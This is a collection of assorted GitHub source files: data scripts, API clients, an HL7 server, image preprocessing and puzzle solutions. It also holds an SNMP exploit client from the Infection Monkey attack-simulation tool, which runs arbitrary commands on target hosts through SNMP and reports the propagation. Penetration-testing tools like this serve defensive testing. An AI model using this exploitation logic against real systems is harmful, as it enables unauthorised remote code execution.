The specified class must\n                have a no-arg constructor and provide a get(block, timeout)\n                method.\n        \"\"\"\n        self.es_client_factory = es_client_factory\n        self.size = size\n        self.queue_class = queue_class\n        super(ESClientPool, self).__init__(\n            self.size,\n            factory=self.es_client_factory,\n            queue_class=self.queue_class)\n","repo_name":"techresidents/tres","sub_path":"tres/pool.py","file_name":"pool.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"30475074868","text":"import json\n\ncollections = [\n    'review_count',\n    'num_friends',\n    'useful',\n    'funny',\n    'cool',\n    'fans',\n    'elite',\n    'average_stars',\n    'compliment_cool',\n    'compliment_cute',\n    'compliment_funny',\n    'compliment_hot',\n    'compliment_list',\n    'compliment_more',\n    'compliment_note',\n    'compliment_photos',\n    'compliment_plain',\n    'compliment_writer'\n]\n\nfile_prefix = '../data/raw/collections/'\nfile_suffix = '.json'\n\nfor c in collections:\n    file = file_prefix + c + file_suffix\n\n    with open(file) as f:\n        data = json.load(f)\n        sorted_data = sorted(data)\n\n    with open(file, 'w') as outfile:\n        json.dump(sorted_data, outfile)","repo_name":"rahrang/yelp-dataset-project","sub_path":"src/scripts/helpers/sort_collections.py","file_name":"sort_collections.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"21167933198","text":"# 2. Study the list of open APIs (https://www.programmableweb.com/category/all/apis).\n# Find any one of them that requires authorization (of any type).\n# Make requests to it after authorizing. Write the server's response to a file.\n\nimport requests\nimport json\n\ntoken = 'xxxxxxxxxx'\n\nurl = 'https://api.vk.com/method/groups.get'\nparams = {\n    'access_token': token,\n    'user_id': '21507694',\n    'v': '5.130',\n    'extended': 1\n}\n\nreq = requests.get(url, params=params)\nprint(f'Response code: {req.status_code}')\nif req.ok:\n    try:\n        res = req.json()\n        with open('groups.json', 'w', encoding='utf-8') as file:\n            json.dump(res, file, indent=2, ensure_ascii=False)\n        print('Group list:')\n        for item in res.get('response').get('items'):\n            print(f'{item.get(\"name\")}')\n    except ValueError:\n        print('Error saving to file')\n","repo_name":"ZV8/GB-Web-data-processing-methods","sub_path":"Lesson_1/lesson_1_2.py","file_name":"lesson_1_2.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"17019791714","text":"#Overview: Write a program that models an email message, then a test program to test the email emulator\n#Define a message class that includes a sender, recipient, and body\n#In the message class, have a constructor with self, sender, and recipient parameters\n#Set Values for the sender and recipient\n#Set body as an empty string\n\n#An append method w/ self and line parameters.\n#Line contains the line of text to add to the body of the message\n#Each line should end with a newline character\n\n#A to_string method that returns the string interpretation of the message\n#It should include the sender, recipient, and body of the message\n\n#A str_ok method that validates the string parameters\n\nfrom EllaLeyLab4 import Message\n\n\nLetter = Message()\nLetter.sender = 'Default Sender'\nLetter.recipient = 'Default Recipient'\nLetter.setBody(\"\")\ndef main():\n    done = True\n    while done:\n        # Setting Sender\n        
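# NOTE (annotation): setSender/setRecipient/appendBody/toString are assumed to be\n        # setter-style helpers defined on the Message class in EllaLeyLab4, which is not\n        # shown in this file.\n        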
Letter.setSender('Ella')\n # Output Sender\n print(f\"The sender is {Letter.sender}\")\n Letter.setRecipient('Stephanie')\n print(f\"The recipient is {Letter.recipient}\")\n # Message Body\n Letter.appendBody(\"For Christmas, I would like:\")\n Letter.appendBody(\"New Keyboard Switches\")\n Letter.appendBody(\"A VPC MongoosT-50CM3 Base\")\n# String Length checker validation\n Letter.appendBody(\"A VPC Constellation ALPHA-R, VPC MongoosT-50CM3 Throttle, and VPC Ace Flight Pedals\")\n Letter.toString()\n # Diagnostics\n # print(Letter.sender)\n # print(Letter.recipient)\n # print(f\"The final message is {Letter.FinalMessage}\")\n done = False\n\nif __name__ == \"__main__\":\n main()\n\n'''\nTest Run Results:\nThe sender is Ella\nThe recipient is Stephanie\nError: End of line expected\nFor Christmas, I would like:\nNew Keyboard Switches\nA VPC MongoosT-50CM3 Base\n\n'''","repo_name":"fuzesmonk/CIS-117-Assignments","sub_path":"Lab 4/demo_EllaLey.py","file_name":"demo_EllaLey.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15278861454","text":"# -*- coding: utf-8 -*-\r\n#\r\n# Copyright (c) 2012-2015, CRS4\r\n#\r\n# Permission is hereby granted, free of charge, to any person obtaining a copy of\r\n# this software and associated documentation files (the \"Software\"), to deal in\r\n# the Software without restriction, including without limitation the rights to\r\n# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of\r\n# the Software, and to permit persons to whom the Software is furnished to do so,\r\n# subject to the following conditions:\r\n#\r\n# The above copyright notice and this permission notice shall be included in all\r\n# copies or substantial portions of the Software.\r\n#\r\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS\r\n# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE AUTHORS OR\r\n# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER\r\n# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN\r\n# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\nfrom __future__ import absolute_import\r\nfrom __future__ import print_function\r\nimport uuid\r\nfrom hl7apy.core import Message, Segment\r\nfrom hl7apy.parser import parse_message\r\n\r\nimport re\r\n\r\ntry:\r\n    from SocketServer import StreamRequestHandler, TCPServer\r\nexcept ImportError: # Python 3\r\n    from socketserver import StreamRequestHandler, TCPServer\r\n\r\n#: characters used for MLLP framing\r\nSB = \"\\x0b\"\r\nEB = \"\\x1c\"\r\nCR = \"\\x0d\"\r\n\r\nclass MLLProtocol(object):\r\n    \"\"\"\r\n    Only checks whether the message is framed in the following pattern:\r\n    \\x0b{message_content}\\x1c\\x0d\r\n    \"\"\"\r\n    validator = re.compile(SB + \"(([^\\r]+\\r){1,})\" + EB + CR)\r\n\r\n    @staticmethod\r\n    def get_message(line):\r\n        message = None\r\n        matched = MLLProtocol.validator.match(line)\r\n        if matched is not None:\r\n            message = matched.groups()[0]\r\n        return message\r\n\r\n\r\ndef responder(m):\r\n    # create an RSP_K11 response message\r\n    response = Message(\"RSP_K11\")\r\n    response.MSH.MSH_9 = \"RSP^K11^RSP_K11\"\r\n    response.MSA = \"MSA|AA\"\r\n    response.MSA.MSA_2 = m.MSH.MSH_10\r\n    qak = Segment(\"QAK\")\r\n    qak.qak_1 = m.QPD.QPD_2\r\n    qak.qak_2 = \"OK\"\r\n    qak.qak_3 = \"Q22^Specimen Labeling Instructions^IHE_LABTF\"\r\n    qak.qak_4 = \"1\"\r\n    response.add(qak)\r\n    response.QPD = m.QPD\r\n    response.PID.PID_1 = '1'\r\n    response.PID.PID_5.PID_5_1 = 'CUNHA'\r\n    response.PID.PID_5.PID_5_2 = 'JOSE'\r\n    response.PID.PID_6 = \"19800101\"\r\n    response.PID.PID_7 = \"F\"\r\n    response.PID.PID_23 = \"Brasil\"\r\n    spm = Segment(\"SPM\")\r\n    obr = Segment(\"OBR\")\r\n    spm.SPM_1 = '1'\r\n    spm.SPM_2 = \"12345\"\r\n    obr.OBR_4 = \"ORDER^DESCRIPTION\"\r\n    response.add(spm)\r\n    response.add(obr)\r\n    return response.to_mllp()\r\n\r\nclass MLLPServer(StreamRequestHandler):\r\n    \"\"\"\r\n    Simplistic implementation of a TCP server implementing the MLLP protocol\r\n    HL7 messages are encoded between bytes \\x0b and \\x1c\\x0d\r\n    \"\"\"\r\n\r\n    def handle(self):\r\n        line = ''\r\n        while True:\r\n            char = self.rfile.read(1)\r\n            if not char:\r\n                print('Client disconnected')\r\n                break\r\n            line += char\r\n            # check whether there is a complete HL7 message in the buffer\r\n            message = MLLProtocol.get_message(line)\r\n            if message is not None:\r\n\r\n                try:\r\n                    # parse the incoming message\r\n                    m = parse_message(message, find_groups=False)\r\n                    print(\"\\n=========================================================================\")\r\n                    print(\"Message received successfully\")\r\n                    print(\"\\nReceived message type: \", m.MSH.message_type.to_er7())\r\n                    print(\"\\nMessage received from: \", m.MSH.sending_application.to_er7())\r\n                    print(\"\\nMessage content:\", repr(m.to_er7()))\r\n                    print(\"\\n=========================================================================\")\r\n                except:\r\n                    print(\"Parsing failed!\", repr(message))\r\n\r\n                if m.MSH.MSH_9.MSH_9_3.to_er7() == 'QBP_Q11':\r\n                    response = responder(m)\r\n                else:\r\n                    print (\"Unexpected message received!\")\r\n                    response = \"none\"\r\n\r\n                self.wfile.write(response)\r\n                line = ''\r\n\r\nif __name__ == \"__main__\":\r\n    HOST, PORT = \"localhost\", 6000\r\n\r\n    server = TCPServer((HOST, PORT), MLLPServer)\r\n    
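# NOTE (annotation): serve_forever() blocks this process; to exercise the server, send an\r\n    # MLLP-framed QBP^Q11 message (\\x0b ... \\x1c\\x0d) from an HL7 client in another process.\r\n    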
server.serve_forever()\r\n","repo_name":"rcaporal/hl7_python","sub_path":"servidor.py","file_name":"servidor.py","file_ext":"py","file_size_in_byte":4681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9063366198","text":"import numpy as np\nimport matplotlib\nmatplotlib.use('agg')\nimport matplotlib.pyplot as plt\nfrom skimage.color import rgb2gray\nfrom skimage.morphology import disk\nfrom skimage.filters import rank\nfrom skimage.transform import ProjectiveTransform, warp\nfrom skimage.filters import gabor_kernel\nfrom scipy.signal import fftconvolve\nfrom skimage.filters import threshold_otsu\nfrom skimage import measure\nfrom skimage.transform import hough_line, hough_line_peaks\nfrom skimage.morphology import skeletonize\nfrom skimage.exposure import adjust_log\nfrom skimage.util import img_as_ubyte\nfrom skimage.transform import resize\nimport os\n\n\nMAX_SIDE_LENGTH = 1024\n \n\ndef resize_im(im, max_side):\n \"\"\"Resize an image so the its longer side is the specified length\"\"\"\n ratio = float(max_side) / max(im.shape[:2])\n new_h = int(round(ratio*im.shape[0]))\n new_w = int(round(ratio*im.shape[1]))\n return resize(im, (new_h, new_w))\n\n\ndef dist_angle_to_slope_interept(line):\n \"\"\"Convert between line representations\"\"\"\n angle, dist = line\n slope = np.tan(angle - np.pi/2)\n y_intercept = dist / np.sin(angle)\n return slope, y_intercept\n\n\ndef line_intersection(line1, line2):\n \"\"\"\n Compute the point of intersection between two lines \n (in dist-angle representation)\n \"\"\"\n if line1[0] == 0:\n print('line 1 vertical')\n if line2[0] == 0:\n a, c = dist_angle_to_slope_interept(line1)\n print('line 2 vertical')\n print(line1, a, c)\n a, c = dist_angle_to_slope_interept(line1)\n b, d = dist_angle_to_slope_interept(line2)\n if a == b: # lines are parallel or coincident\n return None\n x = (d - c) / (a - b)\n y = (a*d - b*c) / (a - b)\n return x, y\n\n\ndef line_invrot90(line, im_shape):\n \"\"\"\n Rotate a line in dist-angle representation in the same sense as np.rot90\n \"\"\"\n theta1, d1 = line\n theta2 = np.pi/2 - theta1\n if abs(theta2) == 0 :\n return 0, im_shape[0] - d1\n x1, y1 = d1 * np.cos(theta1), d1 * np.sin(theta1)\n h1 = d1 / np.cos(theta2)\n h2 = im_shape[0] - h1\n d2 = h2 * np.cos(theta2)\n return -theta2, d2\n\n\ndef edge_response(im, sigma, thetas=np.linspace(-np.pi/10, np.pi/10, 5)):\n \"\"\"Compute the edge response max-pooled over a range of orientations\"\"\"\n kernels = []\n for theta in thetas:\n kern = gabor_kernel(.1/sigma, theta=theta, sigma_x=sigma, sigma_y=2*sigma, n_stds=2).imag\n kern = np.rot90(kern, 3)\n kernels.append(np.fliplr(np.flipud(kern)))\n\n # kernel responses, max pooled over orientations\n resp_im = np.zeros_like(im)\n for kern in kernels:\n resp = fftconvolve(im, kern, mode='same')\n resp_im = np.maximum(resp, resp_im)\n return resp_im\n\n\ndef brightest_object_mask(gray):\n \"\"\"\n Threshold a grayscale response image and return a mask of the brightest object\n \"\"\"\n edges = gray > threshold_otsu(gray)\n\n # create a mask containing the object with the strongest response\n label_im = measure.label(edges)\n regions = measure.regionprops(label_im)\n if len(regions) == 0:\n raise ValueError('mask must have at least one object')\n max_resp = 0\n for region in regions:\n lbl = region.label\n mask = label_im == lbl\n region_resp = gray[mask].sum()\n if region_resp > max_resp:\n max_resp = region_resp\n max_region = region\n largest_object_mask = label_im 
== max_region.label\n    return largest_object_mask\n\n\ndef best_horizontal_line(im, theta_range=np.pi/10, n_theta=5):\n    \"\"\"Find the dominant horizontal (dark-above-bright) line in an image\"\"\"\n    \n    # Compute horizontal edges, get biggest outline\n    resp_im = edge_response(im, sigma=5, thetas=np.linspace(-theta_range, theta_range, n_theta))\n    outline_mask = brightest_object_mask(resp_im)\n    \n    # FIXME: if outline map overlaps the top of im, this means that the receipt\n    # is not centered correctly (receipt edge outside frame)\n    \n    # Hough transform\n    h, theta, d = hough_line(skeletonize(outline_mask), theta=np.linspace(-np.pi/2, np.pi/2, 180))\n    _, angles, dists = hough_line_peaks(h, theta, d, threshold=0.1 * h.max(), num_peaks=10)\n    \n    # Compute gradient strength along each Hough line\n    line_strength_dict = {}\n    for angle, dist in zip(angles, dists):\n        y0 = (dist - 0 * np.cos(angle)) / np.sin(angle)\n        y1 = (dist - outline_mask.shape[1] * np.cos(angle)) / np.sin(angle)\n        y0 = min([y0, outline_mask.shape[0]])\n        y1 = min([y1, outline_mask.shape[0]])\n        pt1 = (y0, 0)\n        pt2 = (y1, outline_mask.shape[1])\n        line_profile = measure.profile_line(resp_im, pt1, pt2)\n        line_strength_dict[(angle, dist)] = line_profile.mean()\n\n    horizontal_lines = [line for line in line_strength_dict if np.pi/2 - abs(line[0]) < theta_range]\n    try:\n        best_line = max(horizontal_lines, key=lambda x: line_strength_dict[x])\n    except ValueError:\n        return None\n    return best_line\n\n\ndef get_receipt_edges(gray):\n    \"\"\"The (straight-line) edges of a centered 4-sided white object\"\"\"\n\n    # TODO: disk/selem size should be fraction of input size\n    median = rank.median(gray, disk(11))\n    \n    # Divide into halves\n    top_im = median[:int(median.shape[0]/2), :]\n    bottom_im = median[int(median.shape[0]/2):, :]\n    left_im = median[:, :int(median.shape[1]/2)]\n    right_im = median[:, int(median.shape[1]/2):]\n\n    # Rotate so center is down, detect best horizontal line\n    top_line = best_horizontal_line(top_im)\n    left_line = best_horizontal_line(np.rot90(left_im,3))\n    right_line = best_horizontal_line(np.rot90(right_im))\n    bottom_line = best_horizontal_line(np.rot90(bottom_im,2))\n    \n    # Rotate back to original orientation\n    right_line = line_invrot90(right_line, np.rot90(right_im).shape)\n    bottom_line = line_invrot90(line_invrot90(bottom_line, np.rot90(bottom_im,2).shape), np.rot90(bottom_im).shape)\n    left_line = line_invrot90(line_invrot90(line_invrot90(left_line, np.rot90(left_im).shape), np.rot90(left_im,2).shape), np.rot90(left_im,3).shape)\n\n    # Correct for offset/cropping\n    right_line = right_line[0], right_line[1] + np.cos(right_line[0])*gray.shape[1]/2\n    bottom_line = bottom_line[0], bottom_line[1] + np.sin(bottom_line[0]) * gray.shape[0]/2\n    \n    return top_line, right_line, bottom_line, left_line\n\n\ndef preprocess_image(im):\n\n    im = resize_im(im, MAX_SIDE_LENGTH)\n    gray = rgb2gray(im)\n\n    # Get the edges of the receipt\n    top_line, right_line, bottom_line, left_line = get_receipt_edges(gray)\n\n    # Intersect to get corners\n    TR = line_intersection(top_line, right_line)\n    TL = line_intersection(top_line, left_line)\n    BR = line_intersection(bottom_line, right_line)\n    BL = line_intersection(bottom_line, left_line)\n\n    # Warp so receipt corners are image corners\n    transform = ProjectiveTransform()\n    height = max([BL[1] - TL[1], BR[1] - TR[1]])\n    width = max([TR[0] - TL[0], BR[0] - BL[0]])\n    src_pts = np.array([TL, TR, BL, BR])\n    dest_pts = np.array([[0, 0], \n                         [width, 0],\n                         [0, height],\n                         [width, height]\n                         ])\n    success = 
transform.estimate(src_pts, dest_pts)\n warped_im = warp(gray, transform.inverse)[:int(height), :int(width)]\n\n warped_gray = rgb2gray(warped_im)\n enhanced_gray = img_as_ubyte(adjust_log(warped_gray))\n\n return enhanced_gray\n\n\n\nif __name__=='__main__':\n\n in_fn = '../data/receipt.jpg'\n\n im = plt.imread(in_fn)\n print(im.shape)\n enhanced_gray = preprocess_image(im)\n \n\n fname, ext = os.path.splitext(in_fn)\n out_fn = fname + '_preprocessed' + ext\n print(out_fn)\n plt.imsave(out_fn, enhanced_gray)\n","repo_name":"brikeats/receipt-reader","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":7740,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"21"} +{"seq_id":"2161211040","text":"import requests\nfrom requests.auth import HTTPBasicAuth\nimport json\nimport uuid\n\n\ndef process_payment(merchant_email, amount, details):\n details_dict = {\n 'email': details[0][0],\n 'clientId': details[0][1],\n 'secret': details[0][2],\n 'ref': details[0][3]\n }\n # Generate unique UUID's for sender_batch_id\n batch_id = uuid.uuid4()\n # Parameters for making API requests\n url = \"https://api.sandbox.paypal.com/v1/oauth2/token\"\n payload = 'grant_type=client_credentials'\n headers = {'Accept': 'application/json'}\n\n auth_header = {'Username': details_dict['clientId'],\n 'Password': details_dict['secret']}\n # POST request to get access token\n response = requests.post(url, headers=headers, data=payload, auth=HTTPBasicAuth(\n auth_header['Username'], auth_header['Password']))\n\n access_token = response.json()['access_token']\n print(f'ACCESS TOKEN {access_token}')\n\n # Use the access token from response to create a batch payout\n url = \"https://api.sandbox.paypal.com/v1/payments/payouts\"\n\n payload = {\n \"sender_batch_header\": {\n \"sender_batch_id\": \"Payouts_2020_\"+str(batch_id),\n \"email_subject\": \"You have a payout!\",\n \"email_message\": \"You have received a payout! 
Thanks for using our service!"\n        },\n        "items": [\n            {\n                "recipient_type": "EMAIL",\n                "amount": {\n                    "value": amount,\n                    "currency": "USD"\n                },\n                "note": "Thanks for your patronage!",\n                "sender_item_id": "201403140001",\n                "receiver": merchant_email,\n                "alternate_notification_method": {\n                    "phone": {\n                        "country_code": "91",\n                        "national_number": "9999988888"\n                    }\n                }\n            }\n        ]\n    }\n\n    payload_json = json.dumps(payload)\n\n    headers = {\n        'Content-Type': 'application/json',\n        'Authorization': 'Bearer ' + access_token\n    }\n    # POST request to make a payout\n\n    response = requests.post(url, headers=headers, data=payload_json)\n\n    print(f'PAYOUT {response.json()}')\n    print(response.status_code)\n    return response.status_code\n","repo_name":"MeetJainAi/PAYMENT-USING-FACIAL-RECOGNITION","sub_path":"payment.py","file_name":"payment.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"22072870715","text":"# Implement function ToLowerCase() that has a string parameter str, and returns the same string in lowercase.\n#\n#\n#\n# Example 1:\n#\n# Input: \"Hello\"\n# Output: \"hello\"\n# Example 2:\n#\n# Input: \"here\"\n# Output: \"here\"\n# Example 3:\n#\n# Input: \"LOVELY\"\n# Output: \"lovely\"\n\n\n\n# Logic\n# Check if the current char is between \"A\" and \"Z\" (using ord)\n    # If yes, convert it to a lowercase char using the ord and chr built-in methods\n    # If not, append the char directly to the new string\n# Return lower case string\n\n\n\nclass Solution:\n    def toLowerCase(self, str: str) -> str:\n        lower_case_string = \"\"\n        MIN_ORD = ord(\"A\")\n        MAX_ORD = ord(\"Z\")\n\n        for s in str:\n            curr_char_ord = ord(s)\n            if MIN_ORD <= curr_char_ord <= MAX_ORD:\n                lower_case_converted_char = curr_char_ord + 32\n                lower_case_string += chr(lower_case_converted_char)\n            else:\n                lower_case_string += s\n\n        return lower_case_string","repo_name":"ambarish710/python_concepts","sub_path":"leetcode/easy/709_To_Lower_Case.py","file_name":"709_To_Lower_Case.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"40542012592","text":"from functools import partial, wraps\nfrom ipaddress import IPv4Address\nfrom logging import getLogger\nfrom time import time\nfrom typing import Callable, Tuple, Type\n\nfrom monkeytypes import Event\n\nfrom common.agent_events import ExploitationEvent, PropagationEvent\nfrom common.event_queue import IAgentEventPublisher\nfrom common.tags.attack import (\n    EXPLOITATION_FOR_CLIENT_EXECUTION_T1203_TAG,\n    EXPLOITATION_OF_REMOTE_SERVICES_T1210_TAG,\n    INGRESS_TOOL_TRANSFER_T1105_TAG,\n)\nfrom common.types import AgentID\nfrom common.utils.code_utils import insecure_generate_random_string\nfrom infection_monkey.i_puppet import TargetHost\n\nfrom .snmp_client import SNMPClient\nfrom .snmp_options import SNMPOptions\n\nCOMMAND_NAME_LENGTH = 6\n\nlogger = getLogger(__name__)\n\n\nSNMP_EXPLOITER_TAG = \"snmp-exploiter\"\nEXPLOITATION_TAGS = (\n    SNMP_EXPLOITER_TAG,\n    EXPLOITATION_FOR_CLIENT_EXECUTION_T1203_TAG,\n    EXPLOITATION_OF_REMOTE_SERVICES_T1210_TAG,\n)\nPROPAGATION_TAGS = (SNMP_EXPLOITER_TAG, INGRESS_TOOL_TRANSFER_T1105_TAG)\n\n\ndef repeat_on_error(max_times: int = 3, error_types: Tuple[Type] = (Exception,)):\n    \"\"\"\n    Decorator to repeat a command if it fails with an error\n\n    :param max_times: The maximum number of times to repeat the command\n    :param error_types: The types of errors to 
catch\n \"\"\"\n\n def decorator(func):\n @wraps(func)\n def inner(*args, **kwargs):\n for _ in range(max_times - 1):\n try:\n return func(*args, **kwargs)\n except error_types as err:\n logger.debug(f\"Retrying due to error: {err}\")\n\n # Allow the exception on the last try to bubble up\n return func(*args, **kwargs)\n\n return inner\n\n return decorator\n\n\nclass SNMPExploitClient:\n def __init__(\n self,\n agent_id: AgentID,\n agent_event_publisher: IAgentEventPublisher,\n exploiter_name: str,\n snmp_client: SNMPClient,\n generate_command_name: Callable[[], str] = partial(\n insecure_generate_random_string, COMMAND_NAME_LENGTH\n ),\n ):\n self._agent_id = agent_id\n self._agent_event_publisher = agent_event_publisher\n self._exploiter_name = exploiter_name\n self._snmp_client = snmp_client\n self._generate_command_name = generate_command_name\n\n def exploit_host(\n self,\n host: TargetHost,\n community_string: str,\n command: str,\n agent_binary_downloaded: Event,\n options: SNMPOptions,\n ) -> Tuple[bool, bool]:\n \"\"\"\n Exploit the host using SNMP using the provided community string\n\n :param host: The host to exploit\n :param community_string: The community string to use\n :param command: The command to execute\n :param agent_binary_downloaded: An event that will be set when the agent binary is\n downloaded\n :param options: The SNMP options\n :return: A tuple of two booleans: the first indicates whether the exploitation was\n successful, and the second indicates whether the propagation was successful\n \"\"\"\n exploitation_message = \"\"\n exploitation_success = True\n\n timestamp = time()\n try:\n self._exploit(host.ip, community_string, command)\n except Exception as err:\n logger.exception(f\"Attempt to exploit {host.ip} failed due to error: {err}\")\n exploitation_message = f\"{err}\"\n exploitation_success = False\n\n propagation_success = self._evaluate_propagation_success(\n exploitation_success, agent_binary_downloaded, options.agent_binary_download_timeout\n )\n\n self._publish_exploitation_event(\n host, timestamp, exploitation_success, exploitation_message\n )\n self._publish_propagation_event(host, timestamp, propagation_success)\n\n return exploitation_success, propagation_success\n\n def _exploit(self, target_ip: IPv4Address, community_string: str, command: str):\n command_name = self._create_command(target_ip, community_string, command)\n try:\n self._snmp_client.execute_command(target_ip, command_name, community_string)\n finally:\n self._snmp_client.clear_command(target_ip, command_name, community_string)\n\n @repeat_on_error(max_times=3)\n def _create_command(self, target_ip: IPv4Address, community_string: str, command: str) -> str:\n command_name = self._generate_command_name()\n logger.debug(f\"Creating SNMP command {command_name} on {target_ip}\")\n\n self._snmp_client.create_command(target_ip, command_name, community_string, command)\n\n return command_name\n\n def _publish_exploitation_event(\n self, host: TargetHost, timestamp: float, success: bool, message: str\n ):\n self._agent_event_publisher.publish(\n ExploitationEvent(\n source=self._agent_id,\n target=host.ip,\n timestamp=timestamp,\n tags=frozenset(EXPLOITATION_TAGS),\n success=success,\n exploiter_name=self._exploiter_name,\n error_message=message,\n )\n )\n\n def _publish_propagation_event(self, host: TargetHost, timestamp: float, success: bool):\n self._agent_event_publisher.publish(\n PropagationEvent(\n source=self._agent_id,\n target=host.ip,\n timestamp=timestamp,\n 
tags=frozenset(PROPAGATION_TAGS),\n success=success,\n exploiter_name=self._exploiter_name,\n )\n )\n\n @staticmethod\n def _evaluate_propagation_success(\n exploitation_success: bool,\n agent_binary_downloaded: Event,\n agent_binary_download_timeout: float,\n ) -> bool:\n if not exploitation_success:\n return False\n\n logger.debug(\"Waiting for the target to download the agent binary...\")\n agent_binary_downloaded.wait(agent_binary_download_timeout)\n\n return agent_binary_downloaded.is_set()\n","repo_name":"guardicore/monkey","sub_path":"monkey/agent_plugins/exploiters/snmp/src/snmp_exploit_client.py","file_name":"snmp_exploit_client.py","file_ext":"py","file_size_in_byte":6109,"program_lang":"python","lang":"en","doc_type":"code","stars":6367,"dataset":"github-code","pt":"21"} +{"seq_id":"374437635","text":"#!/usr/bin/env python3\n\"\"\"\n# Day 4: Repose Record\n\nhttps://adventofcode.com/2018/day/4\n\n## Challenges\nCovering the walls, someone has spent an hour starting every midnight for the\npast few months secretly observing this guard post! They've been writing down\nthe ID of the one guard on duty that night.\n\n* A: Find the guard that has the most minutes asleep. What minute does that\n guard spend asleep the most?\n* B: Of all guards, which guard is most frequently asleep on the same minute?\n\"\"\"\n\nfrom collections import Counter\nfrom datetime import datetime\nimport re\n\n\ndef main():\n \"\"\"Main\"\"\"\n lines = get_challenge()\n guards = parse_guard_shifts(lines)\n print(\"A: {}\".format(solve_a(guards)))\n print(\"B: {}\".format(solve_b(guards)))\n\n\ndef get_challenge():\n \"\"\"Read lines from the challenge input file\"\"\"\n lines = list()\n with open(\"./input.txt\", 'r') as hdl:\n for line in hdl.readlines():\n lines.append(line.strip())\n return lines\n\n\ndef parse_guard_shifts(log_lines):\n \"\"\"\n Parse a line of input\n\n Example shift entry:\n [1518-11-02 23:56] Guard #3463 begins shift\n \"\"\"\n\n log_entries = dict()\n\n # parse date from log entries\n for log_line in log_lines:\n matches = re.search(r'^\\[([^]]+)\\] (.*)', log_line)\n timestamp = datetime.strptime(matches.group(1), \"%Y-%m-%d %H:%M\")\n log_entries[timestamp] = matches.group(2)\n\n # parse the shifts\n shifts = list()\n shift_tmp = dict()\n nap_tmp = dict()\n for timestamp in sorted(log_entries.keys()): # sorted by date\n if 'begins shift' in log_entries[timestamp]:\n # start a new shift, save previous naps and shifts if present\n if nap_tmp:\n shift_tmp['naps'].append(nap_tmp)\n if shift_tmp:\n shifts.append(shift_tmp)\n matches = re.search(r'Guard #(\\d+)', log_entries[timestamp])\n nap_tmp = dict()\n shift_tmp = {\n 'id': matches.group(1),\n 'start': timestamp,\n 'end': 59,\n 'naps': list(),\n }\n elif 'falls asleep' in log_entries[timestamp]:\n nap_tmp = {\n 'start': timestamp,\n 'end': None,\n }\n elif 'wakes up' in log_entries[timestamp]:\n nap_tmp['end'] = timestamp\n shift_tmp['naps'].append(nap_tmp)\n # save previous naps and shifts if present\n if shift_tmp:\n shifts.append(shift_tmp)\n\n # transform shifts collection into collection of guards and their shifts\n guards = dict()\n for shift in shifts:\n # add guard entry if not present\n if shift['id'] not in guards:\n guards[shift['id']] = list()\n\n # create a minute element for the nap length\n # this makes it easy to count activity per minute in the solutions\n for nap in shift['naps']:\n # store which minutes they were sleeping\n min_count = nap['end'] - nap['start']\n for offset in range(int(min_count.seconds / 60)):\n 
guards[shift['id']].append(nap['start'].minute + offset)\n\n    return guards\n\n\ndef solve_a(guards):\n    # sort guards by minutes slept\n    sorted_keys = sorted(guards.keys(), key=lambda guard: len(guards[guard]))\n    sleepiest_guard = sorted_keys[-1]\n\n    # find the most common minute slept\n    minutes = Counter(guards[sleepiest_guard])\n    sleepiest_minute = minutes.most_common(1)[0][0]\n\n    return int(sleepiest_guard) * int(sleepiest_minute)\n\n\ndef solve_b(guards):\n    sleepiest_log = list()\n    for minute in range(0, 60):\n        # go through the shifts and find who was asleep at this minute\n        minute_log = (minute, None, None)\n        for guard in guards:\n            minutes_slept = guards[guard].count(minute)\n            if not minute_log[1] or minutes_slept > minute_log[1]:\n                minute_log = (minute, int(minutes_slept), int(guard))\n        sleepiest_log.append(minute_log)\n\n    solution = (None, None, None)\n    for entry in sleepiest_log:\n        if not solution[1] or entry[1] > solution[1]:\n            solution = entry\n\n    return solution[0] * solution[2]\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"tobyoxborrow/adventofcode","sub_path":"2018/04-repose-record/guard_log.py","file_name":"guard_log.py","file_ext":"py","file_size_in_byte":4229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
